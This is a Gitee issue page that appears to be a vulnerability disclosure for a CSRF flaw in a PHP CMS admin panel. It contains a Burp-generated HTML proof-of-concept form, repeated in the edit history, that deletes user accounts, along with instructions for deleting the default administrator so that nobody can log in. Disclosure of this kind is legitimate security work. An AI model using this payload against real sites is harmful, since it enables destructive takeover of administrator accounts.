登录
注册
开源
企业版
高校版
搜索
帮助中心
使用条款
关于我们
开源
企业版
高校版
私有云
Gitee AI
NEW
我知道了
查看详情
登录
注册
代码拉取完成,页面将自动刷新
捐赠
捐赠前请先登录
取消
前往登录
扫描微信二维码支付
取消
支付完成
支付提示
将跳转至支付宝完成支付
确定
取消
Watch
不关注
关注所有动态
仅关注版本发行动态
关注但不提醒动态
1
Star
0
Fork
0
Pwn师傅
/
Pwn
代码
Issues
8
Pull Requests
0
Wiki
统计
流水线
服务
Gitee Pages
JavaDoc
PHPDoc
质量分析
Jenkins for Gitee
腾讯云托管
腾讯云 Serverless
悬镜安全
阿里云 SAE
Codeblitz
我知道了,不再自动展开
更新失败,请稍后重试!
Issues
/
详情
移除标识
内容风险标识
本任务被
标识为内容中包含有代码安全 Bug 、隐私泄露等敏感信息,仓库外成员不可访问
There is a CSRF vulnerability in the administrator account
待办的
#I5WAAB
Pwn师傅
拥有者
创建于
2022-10-18 11:47
After the administrator logs in, open this page User list: delete.html --Delete User POC: ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.154.82:81/index.php"> <input type="hidden" name="s" value="admin" /> <input type="hidden" name="c" value="member" /> <input type="hidden" name="a" value="del" /> <input type="hidden" name="modelid" value="6" /> <input type="hidden" name="id" value="2" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` Among them, in name="id" value="2" the admin account ID of the default system administrator is 1. Changing the value="2" to 1 can delete the default administrator account that comes with the system, which makes it impossible to log in! The test screenshot is as follows: ![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png") A new system administrator account named kali is created here to verify the deletion of the CSRF ![输入图片说明](https://foruda.gitee.com/images/1666064448203030839/37cb3d6b_8192872.png "10011.png") BurpSuite grabs the data package and sends it to the CSRF generation module of Engagement tools ![输入图片说明](https://foruda.gitee.com/images/1666064567755554388/2a910ff9_8192872.png "10012.png") ![输入图片说明](https://foruda.gitee.com/images/1666064591704098260/ba76de62_8192872.png "10013.png") Save the contents of the POC CSRF as delete.html, and then open it ![输入图片说明](https://foruda.gitee.com/images/1666064775790071471/cb8cc9e7_8192872.png "10016.png") ![输入图片说明](https://foruda.gitee.com/images/1666064787697684904/b24beffb_8192872.png "10014.png") ![输入图片说明](https://foruda.gitee.com/images/1666064800660537433/cb9a782f_8192872.png "10017.png") Visible, the kali system administrator account has been deleted
After the administrator logs in, open this page User list: delete.html --Delete User POC: ``` <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.154.82:81/index.php"> <input type="hidden" name="s" value="admin" /> <input type="hidden" name="c" value="member" /> <input type="hidden" name="a" value="del" /> <input type="hidden" name="modelid" value="6" /> <input type="hidden" name="id" value="2" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` Among them, in name="id" value="2" the admin account ID of the default system administrator is 1. Changing the value="2" to 1 can delete the default administrator account that comes with the system, which makes it impossible to log in! The test screenshot is as follows: ![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png") A new system administrator account named kali is created here to verify the deletion of the CSRF ![输入图片说明](https://foruda.gitee.com/images/1666064448203030839/37cb3d6b_8192872.png "10011.png") BurpSuite grabs the data package and sends it to the CSRF generation module of Engagement tools ![输入图片说明](https://foruda.gitee.com/images/1666064567755554388/2a910ff9_8192872.png "10012.png") ![输入图片说明](https://foruda.gitee.com/images/1666064591704098260/ba76de62_8192872.png "10013.png") Save the contents of the POC CSRF as delete.html, and then open it ![输入图片说明](https://foruda.gitee.com/images/1666064775790071471/cb8cc9e7_8192872.png "10016.png") ![输入图片说明](https://foruda.gitee.com/images/1666064787697684904/b24beffb_8192872.png "10014.png") ![输入图片说明](https://foruda.gitee.com/images/1666064800660537433/cb9a782f_8192872.png "10017.png") Visible, the kali system administrator account has been deleted
评论 (
0
)
Pwn师傅
创建了
任务
Pwn师傅
修改了
描述
原值
After the administrator logs in, open this page
User list:
delete.html --Delete User
The validation POC is as follows:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.154.82:81/index.php">
<input type="hidden" name="s" value="admin" />
<input type="hidden" name="c" value="member" />
<input type="hidden" name="a" value="del" />
<input type="hidden" name="modelid" value="6" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Among them,
in<input type="hidden" name="id" value="2"/>the admin account ID of the default system administrator is 1.
Changing the value="2" to 1 can delete the default administrator account that comes with the system,
which makes it impossible to log in!
The test screenshot is as follows:
![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png")
A new system administrator account named kali is created here to verify the deletion of the CSRF
![输入图片说明](https://foruda.gitee.com/images/1666064448203030839/37cb3d6b_8192872.png "10011.png")
BurpSuite grabs the data package and sends it to the CSRF generation module of Engagement tools
![输入图片说明](https://foruda.gitee.com/images/1666064567755554388/2a910ff9_8192872.png "10012.png")
![输入图片说明](https://foruda.gitee.com/images/1666064591704098260/ba76de62_8192872.png "10013.png")
Save the contents of the POC CSRF as delete.html, and then open it
![输入图片说明](https://foruda.gitee.com/images/1666064775790071471/cb8cc9e7_8192872.png "10016.png")
![输入图片说明](https://foruda.gitee.com/images/1666064787697684904/b24beffb_8192872.png "10014.png")
![输入图片说明](https://foruda.gitee.com/images/1666064800660537433/cb9a782f_8192872.png "10017.png")
Visible, the kali system administrator account has been deleted
新值
After the administrator logs in, open this page
User list:
delete.html --Delete User
The validation POC is as follows:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.154.82:81/index.php">
<input type="hidden" name="s" value="admin" />
<input type="hidden" name="c" value="member" />
<input type="hidden" name="a" value="del" />
<input type="hidden" name="modelid" value="6" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Among them,
in<input type="hidden" name="id" value="2"/>the admin account ID of the default system administrator is 1.
Changing the value="2" to 1 can delete the default administrator account that comes with the system,
which makes it impossible to log in!
The test screenshot is as follows:
![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png")
A new system administrator account named kali is created here to verify the deletion of the CSRF
![输入图片说明](https://foruda.gitee.com/images/1666064448203030839/37cb3d6b_8192872.png "10011.png")
BurpSuite grabs the data package and sends it to the CSRF generation module of Engagement tools
![输入图片说明](https://foruda.gitee.com/images/1666064567755554388/2a910ff9_8192872.png "10012.png")
![输入图片说明](https://foruda.gitee.com/images/1666064591704098260/ba76de62_8192872.png "10013.png")
Save the contents of the POC CSRF as delete.html, and then open it
![输入图片说明](https://foruda.gitee.com/images/1666064775790071471/cb8cc9e7_8192872.png "10016.png")
![输入图片说明](https://foruda.gitee.com/images/1666064787697684904/b24beffb_8192872.png "10014.png")
![输入图片说明](https://foruda.gitee.com/images/1666064800660537433/cb9a782f_8192872.png "10017.png")
Visible, the kali system administrator account has been deleted
Pwn师傅
修改了
描述
原值
After the administrator logs in, open this page
User list:
delete.html --Delete User
The validation POC is as follows:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.154.82:81/index.php">
<input type="hidden" name="s" value="admin" />
<input type="hidden" name="c" value="member" />
<input type="hidden" name="a" value="del" />
<input type="hidden" name="modelid" value="6" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Among them,
in<input type="hidden" name="id" value="2"/>the admin account ID of the default system administrator is 1.
Changing the value="2" to 1 can delete the default administrator account that comes with the system,
which makes it impossible to log in!
The test screenshot is as follows:
![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png")
A new system administrator account named kali is created here to verify the deletion of the CSRF
![输入图片说明](https://foruda.gitee.com/images/1666064448203030839/37cb3d6b_8192872.png "10011.png")
BurpSuite grab
s
the dat
a
package and sends it to the CSRF generation module of E
ng
agement tools
![输入图片说明](http
s
://forud
a
.gitee.com/images/1666064567755554388/2
a
910ff9_8192872.p
ng
"10012.png")
![输入图片说明](https://foruda.gitee.com/images/16660645
91
7
04098260
/
b
a
76de62
_8192872.png "1001
3
.png")
Save the con
t
ents of the POC CSRF as delete.html, and then open it
![输入图片说明](ht
t
ps://foruda.gitee.com/images/1666064775790071471/cb8cc9e7_8192872.png "10016.png")
![输入图片说明](https://foruda.gitee.com/images/16660647
876
9
7684904
/
b24beffb
_8192872.png "1001
4
.png")
![输入图片说明](https://foruda.gitee.com/images/1666064
800
6
60537433
/
cb9a782f
_8192872.png "1001
7
.png")
Visible, t
h
e kali system administrator account has been deleted
新值
After the administrator logs in, open this page
User list:
delete.html --Delete User
The validation POC is as follows:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.154.82:81/index.php">
<input type="hidden" name="s" value="admin" />
<input type="hidden" name="c" value="member" />
<input type="hidden" name="a" value="del" />
<input type="hidden" name="modelid" value="6" />
<input type="hidden" name="id" value="2" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Among them,
in<input type="hidden" name="id" value="2"/>the admin account ID of the default system administrator is 1.
Changing the value="2" to 1 can delete the default administrator account that comes with the system,
which makes it impossible to log in!
The test screenshot is as follows:
![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png")
A new system administrator account named kali is created here to verify the deletion of the CSRF
![输入图片说明](http
s
://forud
a
.gitee.com/images/1666064448203030839/37cb3d6b_8192872.p
ng
"10011.png")
BurpSuite grab
s
the dat
a
package and sends it to the CSRF gener
a
tion module of E
ng
agement tools
![输入图片说明](https://foruda.gitee.com/images/16660645
67
7
55554388
/
2
a
910ff9
_8192872.png "1001
2
.png")
![输入图片说明](ht
t
ps://foruda.gitee.com/images/1666064591704098260/ba76de62_8192872.png "10013.png")
Save the con
t
ents of the POC CSRF as delete.html, and then open it
![输入图片说明](https://foruda.gitee.com/images/16660647
757
9
0071471
/
cb8cc9e7
_8192872.png "1001
6
.png")
![输入图片说明](https://foruda.gitee.com/images/1666064
787
6
97684904
/
b24beffb
_8192872.png "1001
4
.png")
![输入图片说明](
h
ttps://foruda.gitee.com/images/1666064800660537433/cb9a782f_8192872.png "10017.png")
Visible, the kali system administrator account has been deleted
Pwn师傅
修改了
描述
原值
After the administrator logs in, open this page
User list:
delete.html --Delete User
The
validation POC is as fol
l
ows:
<html>
<!-- CSRF PoC - generated by Burp Suit
e
Professional -->
<body>
<script>history.pushState('', '', '/')</scr
i
pt>
<form action="http://192
.
168.154.82:81/index.php">
<input
t
y
p
e="hidden" nam
e
="s" value="admin" />
<input type="hidden"
name="c"
valu
e
="m
e
mber" />
<input
t
y
p
e="hidden" nam
e
="a" value="del" />
<input
t
y
p
e="hidden" nam
e
="m
o
delid" value="
6
" />
<input
t
y
p
e="hidden" nam
e
="id" valu
e
="2" />
<inpu
t
type="submit"
value="Submit
reques
t
" />
</form>
</body>
</html>
Among them,
in<input type="hidden" name="id" value="2"/>the admin account ID of the default system administrator is 1.
Changing the value="2" to 1 can delete the default administrator account that comes with the system,
which makes it impossible to log in!
The test screenshot is as follows:
![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png")
A new system administrator account named kali is created here to verify the deletion of the CSRF
![输入图片说明](https://foruda.gitee.com/images/1666064448203030839/37cb3d6b_8192872.png "10011.png")
BurpSuite grabs the data package and sends it to the CSRF generation module of Engagement tools
![输入图片说明](https://foruda.gitee.com/images/1666064567755554388/2a910ff9_8192872.png "10012.png")
![输入图片说明](https://foruda.gitee.com/images/1666064591704098260/ba76de62_8192872.png "10013.png")
Save the contents of the POC CSRF as delete.html, and then open it
![输入图片说明](https://foruda.gitee.com/images/1666064775790071471/cb8cc9e7_8192872.png "10016.png")
![输入图片说明](https://foruda.gitee.com/images/1666064787697684904/b24beffb_8192872.png "10014.png")
![输入图片说明](https://foruda.gitee.com/images/1666064800660537433/cb9a782f_8192872.png "10017.png")
Visible, the kali system administrator account has been deleted
新值
After the administrator logs in, open this page
User list:
delete.html --Delete User
The
test screenshot is as fo
l
lows:
![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png")
A new system administrator account nam
e
d kali is created here to verify the deletion of the CSRF
![输入图片说明](https://foruda.gitee.com/images/1666064448203030839/37cb3d6b_8192872.png "10011.png")
BurpSuite grabs the data package and sends
i
t to the CSRF generation module of Engagement tools
![输入图片说明](https://foruda
.
gitee.com/images/1666064567755554388/2a910ff9_8192872.png "10012.png")
![输入图片说明](h
t
t
p
s://foruda.git
e
e.com/images/1666064591704098260/ba76de62_8192872.png "10013.png")
Save the contents of the
POC CSRF
as d
e
let
e
.html, and then open it
![输入图片说明](h
t
t
p
s://foruda.git
e
e.com/images/1666064775790071471/cb8cc9e7_8192872.png "10016.png")
![输入图片说明](h
t
t
p
s://foruda.git
e
e.c
o
m/images/16660
6
4787697684904/b24beffb_8192872.png "10014.png")
![输入图片说明](h
t
t
p
s://foruda.git
e
e.com/imag
e
s/1666064800660537433/cb9a782f_8192872.png "10017.png")
Visible,
t
he kali system
administrator
accoun
t
has been deleted
Pwn师傅
修改了
描述
原值
After the administrator logs in, open this page
User list:
delete.html --Delete User
The test screenshot is as follows:
![输入图片说明](https://fo
r
uda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png")
A new system administrator account named kali is created here to verify the deletion of the CSRF
![输入图片说明](h
t
tps://foruda.gitee.com/image
s
/1666064448203030839/37cb3d6b_8192872.png "10011.png")
BurpSuite grabs
t
he data package and sends it to the CSRF generation module of Engagement tools
![输入图片说明](h
t
t
p
s://foruda.git
e
e.com/images/1666064567755554388/2a910ff9_8192872.png "10012.png")
![输入图片说明](h
t
t
p
s://foruda.git
e
e.
c
om/images/1666064591704098260/ba76de62_8192872.png "10013.png")
Save the contents of the
POC CSRF
as d
e
let
e
.html, and then open it
![输入图片说明](h
t
t
p
s://foruda.git
e
e.c
o
m/images/16660
6
4775790071471/cb8cc9e7_8192872.png "10016.png")
![输入图片说明](h
t
t
p
s://foruda.git
e
e.com/imag
e
s/1666064787697684904/b24beffb_8192872.png "10014.png")
![输入图片说明](h
t
t
p
s://foruda.gite
e
.com/images/1666064800660537433/cb9a782f_8192872.png "10017.png")
Visible, the kali system administrator account has been deleted
新值
After the administrator logs in, open this page
User list:
delete.html --Delete User
POC:
```
<html>
<!-- CSRF PoC - gene
r
ated by Burp Suite Professional -->
<body>
<script>his
t
ory.pushState('', '', '/')</
s
cript>
<form action="ht
t
p://192.168.154.82:81/index.php">
<input
t
y
p
e="hidden" nam
e
="s" value="admin" />
<input
t
y
p
e="hidden" nam
e
="
c
" value="member" />
<input type="hidden"
name="a"
valu
e
="d
e
l" />
<input
t
y
p
e="hidden" nam
e
="m
o
delid" value="
6
" />
<input
t
y
p
e="hidden" nam
e
="id" valu
e
="2" />
<input
t
y
p
e="submit" valu
e
="Submit request" />
</form>
</body>
</html>
```
Among them, in name="id" value="2" the admin account ID of the default system administrator is 1.
Changing the value="2" to 1 can delete the default administrator account that comes with the system,
which makes it impossible to log in!
The test screenshot is as follows:
![输入图片说明](https://foruda.gitee.com/images/1666064342136939556/4cd3f82a_8192872.png "10010.png")
A new system administrator account named kali is created here to verify the deletion of the CSRF
![输入图片说明](https://foruda.gitee.com/images/1666064448203030839/37cb3d6b_8192872.png "10011.png")
BurpSuite grabs the data package and sends it to the CSRF generation module of Engagement tools
![输入图片说明](https://foruda.gitee.com/images/1666064567755554388/2a910ff9_8192872.png "10012.png")
![输入图片说明](https://foruda.gitee.com/images/1666064591704098260/ba76de62_8192872.png "10013.png")
Save the contents of the POC CSRF as delete.html, and then open it
![输入图片说明](https://foruda.gitee.com/images/1666064775790071471/cb8cc9e7_8192872.png "10016.png")
![输入图片说明](https://foruda.gitee.com/images/1666064787697684904/b24beffb_8192872.png "10014.png")
![输入图片说明](https://foruda.gitee.com/images/1666064800660537433/cb9a782f_8192872.png "10017.png")
Visible, the kali system administrator account has been deleted
展开全部操作日志
折叠全部操作日志
登录
后才可以发表评论
状态
待办的
待办的
进行中
已完成
已关闭
负责人
未设置
标签
未设置
标签管理
里程碑
未关联
未关联
Pull Requests
未关联
未关联
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
未关联
未关联
master
开始日期   -   截止日期
-
置顶选项
不置顶
置顶等级:高
置顶等级:中
置顶等级:低
优先级
不指定
严重
主要
次要
不重要
参与者(1)
1
https://gitee.com/CTF-hacker/pwn.git
git@gitee.com:CTF-hacker/pwn.git
CTF-hacker
pwn
Pwn
点此查找更多帮助
搜索帮助
Git 命令在线学习
如何在 Gitee 导入 GitHub 仓库
Git 仓库基础操作
企业版和社区版功能对比
SSH 公钥设置
如何处理代码冲突
仓库体积过大,如何减小?
如何找回被删除的仓库数据
Gitee 产品配额说明
GitHub仓库快速导入Gitee及同步更新
什么是 Release(发行版)
将 PHP 项目自动发布到 packagist.org
评论
仓库举报
回到顶部
登录提示
该操作需登录 Gitee 帐号,请先登录后再操作。
立即登录
没有帐号,去注册